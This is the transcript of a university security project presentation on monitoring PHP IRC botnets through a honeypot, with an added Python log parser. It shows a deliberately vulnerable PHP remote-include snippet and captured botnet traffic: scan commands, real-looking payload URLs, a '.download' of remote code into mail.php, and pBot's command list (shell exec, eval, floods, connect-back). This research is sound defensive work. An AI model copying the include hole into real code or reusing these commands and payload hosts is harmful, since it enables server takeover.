
Monitoring botnets from within

Technion - Israel Institute of Technology, Computer Science Department. Project in Computer Security (236349): Monitoring botnets from within. Students: Yevgeni Sabin, Alexander Chigirintsev. Supervisor: Amichai Shulman.


Presentation Transcript


  1. Technion - Israel Institute of Technology, Computer Science Department
  Project in Computer Security (236349)
  Monitoring botnets from within
  Students: Yevgeni Sabin, Alexander Chigirintsev
  Supervisor: Amichai Shulman

  2. Background
  Botnet – a group of computers infected by malicious code, connected to the Internet and controlled by an attacker via a command and control center (here, an IRC server). In our case the infected machines are web servers.

  3. Background
  RFI – remote file inclusion is a type of attack in which a “dynamic file include” mechanism is exploited. The attacker includes malicious code and takes control over the server. The vulnerable pattern used by our test site:

      // the query string of the request is taken as-is and passed to include(),
      // so a remote URL supplied by the client is fetched and executed
      $url  = $_SERVER['REQUEST_URI'];
      $file = parse_url($url, PHP_URL_QUERY);
      include $file;

  4. Methodology
  Setup:
  • Virtual Machine (VMware) on a home PC
  • OS: Windows XP SP3
  • Apache HTTP server + PHP 5.3
  • Mail server
  • Simple vulnerable site
  • Wireshark

  5. Methodology
  • Links to malicious code were received from the supervisor or found on the Internet. Each link was remotely included in our fake site.
  • All network communication was recorded with a network analyzer and analyzed later.

  6. Infection process (diagram: IRC; find a victim)

  7. IRC Command and Control Server (diagram)

  8–9. Finding vulnerable servers (slide 9 extends slide 8 with the scanner's replies; the ".9,1" fragments are mIRC colour codes lost in rendering)
  :D3V_CO!Cok@Asli.Cah.Muneng.Gumukmas.Jember PRIVMSG #b0yz :!rfi /index.php?DOCUMEN_ROOT= "netcat_files"
  :b0yz9!b0yz@oYikNet-33040E0B.apuyen.info PRIVMSG #b0yz :.9,1[.15rfi.9] .[AsK] 403
  :b0yz9!b0yz@oYikNet-33040E0B.apuyen.info PRIVMSG #b0yz :.9,1[.15rfi.9] .[SaPo] 1055
  :b0yz9!b0yz@oYikNet-33040E0B.apuyen.info PRIVMSG #b0yz :.9,1[.15rfi.9] .[oNeT] 52
  :b0yz9!b0yz@oYikNet-33040E0B.apuyen.info PRIVMSG #b0yz :.9,1[.15rfi.9] .[YahOo] 1222
  :b0yz9!b0yz@oYikNet-33040E0B.apuyen.info PRIVMSG #b0yz :.9,1[.15rfi.9](.4@.9VuLn.15).10 http://www.bsau.ru//index.php?DOCUMEN_ROOT=http://tj9.fileave.com/bot.txt?? (.4@.7safemode-on.15).
  :b0yz9!b0yz@oYikNet-33040E0B.apuyen.info PRIVMSG #b0yz :.9,1[.15rfi.9](.4@.9VuLn.15).10 http://vestnik.bsau.ru//index.php?DOCUMEN_ROOT=http://tj9.fileave.com/bot.txt?? (.4@.7safemode-on.15).
  :b0yz9!b0yz@oYikNet-33040E0B.apuyen.info PRIVMSG #b0yz :.9,1[.15rfi.9](.4@.9VuLn.15).10 http://www.bowling.ru/netcat_files/319/189/h_47768a1cadfac385d61ce9db4ec06c51//index.php?DOCUMEN_ROOT=http://tj9.fileave.com/bot.txt?? (.4@.7safemode-on.15).

  10. What can an infected machine do?
  The bot's built-in command list (from the pBot source):
  /* COMMANDS:
  * .user <password>                                   //login to the bot
  * .logout                                            //logout of the bot
  * .die                                               //kill the bot
  * .restart                                           //restart the bot
  * .mail <to> <from> <subject> <msg>                  //send an email
  * .dns <IP|HOST>                                     //dns lookup
  * .download <URL> <filename>                         //download a file
  * .exec <cmd>                   // uses exec()       //execute a command
  * .sexec <cmd>                  // uses shell_exec() //execute a command
  * .cmd <cmd>                    // uses popen()      //execute a command
  * .info                                              //get system information
  * .php <php code>               // uses eval()       //execute php code
  * .tcpflood <target> <packets> <packetsize> <port> <delay>  //tcpflood attack
  * .udpflood <target> <packets> <packetsize> <delay>         //udpflood attack
  * .raw <cmd>                                         //raw IRC command
  * .rndnick                                           //change nickname
  * .pscan <host> <port>                               //port scan
  * .safe                         // test safe_mode (dvl)
  * .inbox <to>                   // test inbox (dvl)
  * .conback <ip> <port>          // conect back (dvl)
  * .uname                        // return shell's uname using a php function (dvl)
  */
  In short:
  • Sending spam
  • DDoS attack
  • Test for vulnerabilities
  • Download and execute

  11. Getting direct access to the server
  :b0yz_JbX!b0yz@C.r.e.w MODE #preman +v [A]b0yz848
  :b0yz_JbX!b0yz@C.r.e.w PRIVMSG #preman :.user setan
  PRIVMSG #preman :[.Auth.]: OK b0yz_JbX You Are Ready... My OwnER !!!!!!!!!!!!!!!!!!!!
  :b0yz_JbX!b0yz@C.r.e.w PRIVMSG #preman :.info
  PRIVMSG #preman :[.info.]: Windows NT MYSEREVE-E176B7 5.1 build 2600 (Windows XP Professional Service Pack 3) i586 (safe: off)
  PRIVMSG #preman :[.vuln.]: http://buyskie.co.il/redirecter.php?http://95.154.24.14:32000//accounts/inc/admin/apache.jpg
  :b0yz_JbX!b0yz@C.r.e.w PRIVMSG #preman :.download http://95.154.24.14:32000//accounts/inc/admin/ipays.jpg mail.php
  PRIVMSG #preman :[.download.]: Arquivo .http://95.154.24.14:32000//accounts/inc/admin/ipays.jpg. baixadopara .mail.php.
  Example: http://buyskie.sytes.net/back.php

  12. Botnet example
  • Botnet #rafflesia (by room name)
  • Monitoring time: 5 days
  • Number of bots: ~150
  • Joins per day: ~60
  • Leaves per day: ~70
  • Number of bots on the same system: ~3
  • Maximal bots on the same system: 37 (hetzner.de – VDS provider)
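As an added example (not part of the project's slides), a small Python parser for captured IRC lines of the shape shown on slides 8–11: it counts joins/leaves and bots per host (the figures on slide 12), picks up pBot ".cmd" and scanner "!rfi" tasking, per-search-engine hit counts, and VuLn reports with the target and the remotely included URL. The sample capture, nicks and host names below are constructed placeholders, not data from the project.

```python
import re
from collections import Counter
from urllib.parse import urlsplit, parse_qs

# ":nick!user@host COMMAND params :trailing", the IRC message shape seen in the captures
IRC_RE = re.compile(r'^:(?P<nick>[^!\s]+)!(?P<user>[^@\s]+)@(?P<host>\S+)\s+'
                    r'(?P<cmd>\S+)\s*(?P<params>[^:]*?)\s*(?::(?P<text>.*))?$')

# Constructed sample capture (hosts are .invalid placeholders) modelled on the slides' lines
SAMPLE = """\
:scanner1!b0yz@example-scanner.invalid JOIN :#b0yz
:bot-a!b0yz@host-a.invalid JOIN :#b0yz
:bot-b!b0yz@host-a.invalid JOIN :#b0yz
:op!Cok@example-op.invalid PRIVMSG #b0yz :!rfi /index.php?DOCUMEN_ROOT= "netcat_files"
:scanner1!b0yz@example-scanner.invalid PRIVMSG #b0yz :[rfi] [AsK] 403
:scanner1!b0yz@example-scanner.invalid PRIVMSG #b0yz :[rfi](@VuLn) http://victim.example//index.php?DOCUMEN_ROOT=http://payload.example/bot.txt?? (@safemode-on)
:op!Cok@example-op.invalid PRIVMSG #b0yz :.user setan
:op!Cok@example-op.invalid PRIVMSG #b0yz :.download http://payload.example/ipays.jpg mail.php
:bot-b!b0yz@host-a.invalid PART #b0yz
"""

def vuln_report(text):
    """Target host and remotely included URL from a scanner's VuLn line (text must hold a URL)."""
    parts = urlsplit(re.search(r'https?://\S+', text).group())
    payload = next((v[0] for v in parse_qs(parts.query).values() if '://' in v[0]), '')
    return {'target': parts.netloc, 'payload': payload.rstrip('?')}  # "??" only pads the include

def summarize(log):
    """Tally channel churn, bots per host, operator commands and scanner output in one capture."""
    s = {'joins': 0, 'parts': 0, 'bots_per_host': Counter(), 'commands': Counter(),
         'engine_hits': {}, 'vulns': []}
    for raw in log.splitlines():
        m = IRC_RE.match(raw.strip())
        if not m:                       # no prefix (PING, numerics): not interesting here
            continue
        msg = m.groupdict()
        if msg['cmd'] == 'JOIN':
            s['joins'] += 1
            s['bots_per_host'][msg['host']] += 1
        elif msg['cmd'] in ('PART', 'QUIT'):
            s['parts'] += 1
        elif msg['cmd'] == 'PRIVMSG' and msg['text']:
            text = msg['text']
            if text[0] in '.!':                          # pBot ".cmd" or scanner "!rfi" tasking
                s['commands'][text.split()[0]] += 1
            elif 'VuLn' in text and '://' in text:       # scanner reporting an exploitable site
                s['vulns'].append(dict(scanner=msg['nick'], **vuln_report(text)))
            elif hit := re.search(r'\[(\w+)\]\s+(\d+)$', text):  # "[AsK] 403": hits per engine
                s['engine_hits'][hit.group(1)] = int(hit.group(2))
    return s
```

Run over a real Wireshark export of the IRC stream, max(s['bots_per_host'].values()) gives the "maximal bots on the same system" figure and s['vulns'] the list of sites to notify.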

  13. Botnet example (diagram: ~150 participants; scanners)

  14–16. Botnet example (slides 14 to 16 build up the same list)
  • Botnet #rafflesia (by room name)
  • Number of scanners: 6
  • Can look for ~15 vulnerabilities:
    • RFI, LFI, SQL injection, WordPress
    • osCommerce, Zen Cart® Ecommerce, e107 and more
  • Search engines in use: 32
    • GooGLe, ReDiff, Bing, ALtaViSTa, AsK, UoL, CluSty, GutSer, ExaLead, VirgiLio, WebDe, AoL, SaPo, DuCk, YauSe, BaiDu, KiPoT, GiBLa, YahOo, HotBot, LyCos, LyGo, BLacK, oNeT, SiZuka, WaLLa, DeMos, RoSe, SeZnaM, TisCali, NaVeR
  • Scans per day: 48
  • Vulnerabilities looked for: WordPress (88%), RFI (12%)
  • Vulnerable sites found per day: ~155

  17. Botnet example (chart)
  • Botnet #rafflesia (by room name)
  • Vulnerable sites found per day: ~155

  18–20. Compromised site example (screenshots)

  21. Conclusions
  • The main use of PHP botnets is searching for and infecting vulnerable sites; a PHP botnet provides a good ready-to-use infrastructure for this purpose.
  • Almost no “traditional” botnet activity was observed. Traditional attacks such as DDoS are hard to carry out with such a low number of participants.
  • Low variety of bots in use (mainly “pBot”); most of their functionality is not used.
  • Known (old) vulnerabilities are used to infect the systems, so only sites that are not well maintained can be infected.

  22. Further steps
  • Improve the honeypot: a more realistic site that holds information interesting to an attacker. A small online store is very attractive to hackers.
  • Try to get the system infected the normal way the botnets do it, through the scanners (get into Google search results).
  • More observation time (a few weeks)
